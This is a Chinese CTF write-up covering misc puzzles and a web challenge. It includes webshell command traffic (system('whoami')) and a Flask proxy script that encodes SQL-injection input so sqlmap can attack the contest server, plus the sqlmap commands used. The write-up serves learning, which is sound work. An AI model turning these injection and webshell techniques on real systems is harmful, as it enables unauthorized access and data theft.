Misc

签到

http://106.55.249.213:5002/
祝各位大佬,大大佬,新春快乐!
2021 更加牛13!!!

flag在短片中:flag{Happy_New_Year_2021}

Flag不在这

Flag真的不在这,你要相信我,知道吗!

打开显示

Flag不在这!

于是放入010发现是个压缩包,打开发现flag.txt:flag{It's_real_easy!D0_Y0u_Like_it?}

牛年大吉

要相信自己,他就是flag!

查看属性发现flag:flag{这个就是哦!}

网络深处

网络深处! 千万不要一个人大晚上做哦!!!

2020UNCTF原题就不写了.滑稽.jpg

拼图

你也喜欢鬼刀吗?

montage合成 + gaps对大图遗传算法解拼图
①.montage(Windows)(PS:将其改为1200X1200)

montage "D:\Harvey\赛题\SXCCTF\杂项\zip\拼图\*.png" -tile 10x10 -geometry +0+0 result.png

②.gaps(kali)解得flag:flag{123A4X5b6cLi}

安装命令
git clone https://github.com/nemanja-m/gaps.git
cd gaps
sudo python3 setup.py install
拼图命令
gaps --image=/home/kali/Desktop/result.png --generation=30 --population=300 --size=120

Very very easy hex

Very very easy hex!! Enjoy it!!!

套娃解压缩包,先写个循环解压的脚本解出168张图

附上脚本

import zipfile
import re

zipname = "img.zip"
while True:
    ts1 = zipfile.ZipFile(zipname)
    ts1.extractall("./")
    zipname = "./"+ts1.namelist()[0]

解法一:菜鸡做法

接着发现这些图片hex就 04083A00 和 012040D0 两种格式

于是将其分别标注为0/1得到如下:

011001100110110001100001011001110111101101000100001100000101111101111001001100000111010101011111011011000110100101101011011001010101111101101001011101000011111101111101

最后转成字符串得到flag:flag{D0_y0u_like_it?}

解法二:大佬只需一个脚本梭哈QAQ

跑下脚本得到flag:flag{D0_y0u_like_it?}

附上脚本

from PIL import Image

binstr=''
for i in range(168):
    img=Image.open(str(i)+'.png')
    char=img.getpixel((0,0))
    if char==(0, 0, 0, 255):
        binstr+='0'
    else:
        binstr+='1'
    if len(binstr)>=8:
        print(chr(int(binstr,2)),end='')
        binstr=''

YLBNB

你会喜欢他的! :)

原题by UNCTF2020-YLB绝密文件
不会复现.jpg

Love_it!

文件较大,选择网盘下载(手动狗头)
蓝奏:https://wws.lanzous.com/iy5T6lf343g 密码:gbmf
百度云:链接: https://pan.baidu.com/s/1wT3bVls2X_5bOSBaxBK91A 提取码: ufrs 复制这段内容后打开百度网盘手机App,操作更方便哦

解压密码为:2021_jia_you!!
flag 为 flag{后台名称_后台账号_后台密码_一句话木马名称_一句话密码_第三个马子执行的命令}
例如:
后台网址为:
http://127.0.0.1/admin/index.php 后台名称就为: admin
账号为:2021 后台账号为: 2021
密码为:happy_new_year! 后台密码为: happy_new_year!
一句话木马路径为: http://127.0.0.1/mu.php 一句话木马名称为: mu
一句话木马 一句话密码为: starsnow
一句话执行的命令
连接马子 之后执行的第三条 命令
第一条 yingzi=phpinfo();
第二条 yingzi=system('whoami');
第三条 yingzi=system('ls'); 第三个马子执行的命令: system('ls');

例如:
flag{admin_2021_happy_new_year!_starsnow_system('ls');}

由题可知流量里面有传马
于是在筛选http下进行搜集题目所要求的信息

后台名:dede;后台账号:admin;密码:starsnowniubi

一句话木马名称:ma

一句话密码:yingzi;第三个马子执行的命令:echo `whoami`

最终整合得到flag:

flag{dede_admin_starsnowniubi_ma_yingzi_echo `whoami`;}                  

Web

base

106.55.249.213:5001
BaseBaseBase
你遇见过渗透中传输值为加密的嘛?

打开链接发现他还带有参数后面,再根据题目信息,于是我尝试了各种base,无果

http://106.55.249.213:5001?user=QgcAYAbgbw/

Sorry,you are not admin!you are Guest

最后试了试robots.txt发现了个base.txt

接着将其保存下来,组合成一个字典得到admin=XAXwaAZAaQ

附上脚本

import requests

res="{"
with open("base.txt", 'r') as f:
    a = f.readlines()
    for i in a:
        tmp  = i.strip("\n")
        url = 'http://106.55.249.213:5001/?user='+tmp
        # print(url)
        r = requests.get(url)
        z = r.text[32:]
        if z!='':
            k = f'"{z}":"{tmp}",'
        res += k
res=res[:-1]
res+="}"
print(res)

经大佬指点得知需要整个flask脚本实现中转注入

附上脚本

import requests
from flask import Flask,request

app = Flask(__name__)
a = {" ": "CA", "!": "HA", "": "HQ", "#": "Hg", "$": "Hw", "%": "IA", "&": "IQ", "'": "Ig", "(": "Iw", ")": "JA",
     "*": "JQ", "+": "Jg", ",": "Jw", "-": "KA", ".": "KQ", "/": "Kg", "0": "Kw", "1": "LA", "2": "LQ", "3": "Lg",
     "4": "Lw", "5": "MA", "6": "MQ", "7": "Mg", "8": "Mw", "9": "NA", ":": "NQ", ";": "Ng", "<": "Nw", "=": "OA",
     ">": "OQ", "?": "Og", "@": "Ow", "A": "PA", "B": "PQ", "C": "Pg", "D": "Pw", "E": "QA", "F": "QQ", "G": "Qg",
     "H": "Qw", "I": "RA", "J": "RQ", "K": "Rg", "L": "Rw", "M": "SA", "N": "SQ", "O": "Sg", "P": "Sw", "Q": "TA",
     "R": "TQ", "S": "Tg", "T": "Tw", "U": "UA", "V": "UQ", "W": "Ug", "X": "Uw", "Y": "VA", "Z": "VQ", "[": "Vg",
     "\\": "Vw", "]": "WA", "^": "WQ", "_": "Wg", "`": "Ww", "a": "XA", "b": "XQ", "c": "Xg", "d": "Xw", "e": "YA",
     "f": "YQ", "g": "Yg", "h": "Yw", "i": "ZA", "j": "ZQ", "k": "Zg", "l": "Zw", "m": "aA", "n": "aQ", "o": "ag",
     "p": "aw", "q": "bA", "r": "bQ", "s": "bg", "t": "bw", "u": "cA", "v": "cQ", "w": "cg", "x": "cw", "y": "dA",
     "z": "dQ", "{": "dg", "|": "dw", "}": "eA", "~": "eQ", "": "eg", "聙": "ew", "聛": "fA", "聜": "fQ", "聝": "fg",
     "聞": "fw", "聟": "gA", "聠": "gQ", "聡": "gg", "聢": "gw", "聣": "hA", "聤": "hQ", "聥": "hg", "聦": "hw", "聧": "iA",
     "聨": "iQ", "聫": "ig", "聬": "iw", "聭": "jA", "聮": "jQ", "聯": "jg", "聰": "jw", "聲": "kA", "聳": "kQ", "聴": "kg",
     "聵": "kw", "聶": "lA", "職": "lQ", "聸": "lg", "聹": "lw", "聺": "mA", "聻": "mQ", "聼": "mg", "聽": "mw", "隆": "nA",
     "垄": "nQ", "拢": "ng", "陇": "nw", "楼": "oA", "娄": "oQ", "搂": "og", "篓": "ow", "漏": "pA", "陋": "pQ", "芦": "pg",
     "卢": "pw", "颅": "qA", "庐": "qQ", "炉": "qg", "掳": "qw", "卤": "rA", "虏": "rQ", "鲁": "rg", "麓": "rw", "碌": "sA",
     "露": "sQ", "路": "sg", "赂": "sw", "鹿": "tA", "潞": "tQ", "禄": "tg", "录": "tw", "陆": "uA", "戮": "uQ", "驴": "ug",
     "脌": "uw", "脕": "vA", "脗": "vQ", "脙": "vg", "脛": "vw", "脜": "wA", "脝": "wQ", "脟": "wg", "脠": "ww", "脡": "xA",
     "脢": "xQ", "脣": "xg", "脤": "xw", "脥": "yA", "脦": "yQ", "脧": "yg", "脨": "yw", "脩": "zA", "脪": "zQ", "脫": "zg",
     "脭": "zw", "脮": "0A", "脰": "0Q", "脳": "0g", "脴": "0w", "脵": "1A", "脷": "1Q", "脹": "1g", "脺": "1w", "脻": "2A",
     "脼": "2Q", "脽": "2g", "脿": "2w", "谩": "3A", "芒": "3Q", "茫": "3g", "盲": "3w", "氓": "4A", "忙": "4Q", "莽": "4g",
     "猫": "4w", "茅": "5A", "锚": "5Q", "毛": "5g", "矛": "5w", "铆": "6A", "卯": "6Q", "茂": "6g", "冒": "6w", "帽": "7A",
     "貌": "7Q", "贸": "7g", "么": "7w", "玫": "8A", "枚": "8Q", "梅": "8g", "酶": "8w", "霉": "9A", "煤": "9Q", "没": "9g",
     "眉": "9w"}
def encode(s):
    s=str(s)
    res = ''
    for i in s:
        res += a[i]
    return res


@app.route('/')
def hello_world():
    id=encode(request.args.get('id'))
    url='http://106.55.249.213:5001/?user=XAXwaAZAaQ&id='+id
    return requests.get(url=url).text

app.run(debug=True,port=3389)

先本地跑下flask脚本
接着就是sqlmap查下表就能得到flag:flag{SXC is very funny!}

python sqlmap.py -u http://127.0.0.1:3389?id=1
python sqlmap.py -u http://127.0.0.1:3389?id=1 --dump p id

PS:艹,我这kali2020的sqlmap是假的,跑了十几分钟结果没跑出了